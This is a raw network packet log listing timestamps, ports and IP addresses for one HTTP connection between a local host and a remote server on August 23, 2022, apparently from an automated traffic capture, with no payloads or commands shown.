Aug 23, 2022 18:25:29.944736958 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944756031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944775105 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944835901 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944919109 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944950104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.944993019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945017099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945050955 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945111990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945147991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945171118 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945194006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945383072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945410013 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945432901 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945467949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945550919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945574999 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945597887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945620060 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945658922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945662022 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.945745945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945770025 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945791960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945837975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945871115 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945940971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.945977926 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946014881 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946049929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946108103 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946144104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946177959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946213961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946249008 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946283102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946324110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946361065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946396112 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946427107 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946456909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946491003 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946521997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946521997 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.946556091 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946559906 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.946588993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946600914 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.946651936 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.946688890 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.946727991 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.946760893 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.946768045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946829081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946845055 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.946852922 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.946887970 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.946897030 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946919918 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.946924925 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946947098 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.946953058 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.946975946 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.947001934 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.947022915 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.947051048 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.947055101 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.947072983 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.947078943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.947081089 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.947107077 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.947133064 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.947134018 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.947158098 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.947160959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.947206020 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.980196953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980237961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980262041 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980284929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980310917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980386019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980410099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980427980 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.980457067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980482101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980504990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980525017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980544090 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.980545998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980565071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980587006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980607986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980628967 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.980648041 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.981091022 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.983134031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.983166933 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.983190060 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.983212948 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.983233929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.983262062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.983283043 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.983304024 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.983325958 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.983398914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.984474897 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.984985113 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985014915 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985033989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985055923 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985079050 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985080004 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.985131025 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.985142946 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985166073 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985209942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985232115 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985251904 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985265970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985280991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985323906 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985343933 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985389948 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985420942 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.985421896 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985455990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985480070 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985496998 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.985501051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985538960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985562086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985577106 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985595942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985634089 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985671997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985692978 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985693932 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.985713959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985734940 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985755920 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985775948 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985796928 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985833883 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985855103 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985867977 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.985876083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985897064 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985918045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985939026 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985959053 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.985979080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986000061 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986037970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986057997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986078024 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986099005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986119986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986140013 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986160040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986181974 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986202955 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986222029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986238956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986254930 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986272097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986288071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986311913 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986331940 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986352921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986373901 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986394882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986414909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986437082 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986476898 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986495972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986515999 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986535072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986555099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986562014 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.986576080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986594915 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986628056 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986644983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986664057 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986682892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986701965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986721992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986741066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986764908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986790895 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986824036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986850023 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986882925 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986912012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986938953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986969948 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.986995935 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987020016 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987047911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987076044 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987098932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987123013 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987150908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987217903 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987243891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987282991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987317085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987344027 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987431049 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987466097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987493992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987518072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987554073 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987585068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987608910 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987633944 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987664938 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987694025 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987719059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987751007 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987778902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987898111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987935066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.987963915 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988003969 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988053083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988080025 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988116026 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988143921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988192081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988220930 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.988224983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988253117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988279104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988311052 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988338947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988369942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988404036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988432884 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988466024 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988526106 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988543987 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.988557100 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988584995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988603115 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.988610029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988630056 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988648891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988655090 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.988668919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988687992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988708019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988724947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988743067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988765001 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988770962 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.988785982 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988826990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988832951 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.988852024 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988874912 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988876104 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.988898993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988919020 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.988928080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988961935 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.988964081 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.988993883 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989006042 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989027023 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989058018 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989084005 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989088058 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989100933 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989121914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989151001 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989151001 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989202976 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989228010 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989236116 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989255905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989274979 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989281893 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989327908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989331007 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989356995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989373922 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989388943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989409924 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989413977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989449978 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989485979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989520073 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989552021 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989583015 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989588022 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989615917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989634037 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989649057 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989654064 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989676952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989706039 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.989706993 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.989736080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.990031958 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.018631935 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018685102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018704891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018728018 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018747091 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018767118 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018789053 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018810034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018834114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018852949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018876076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018898010 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018919945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.018943071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.022576094 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.022643089 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.022650003 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.022676945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.022707939 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.022738934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.022767067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.022799969 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.022816896 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:30.022833109 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:30.022866011 CEST	80	49943	88.198.122.116	192.168.2.3
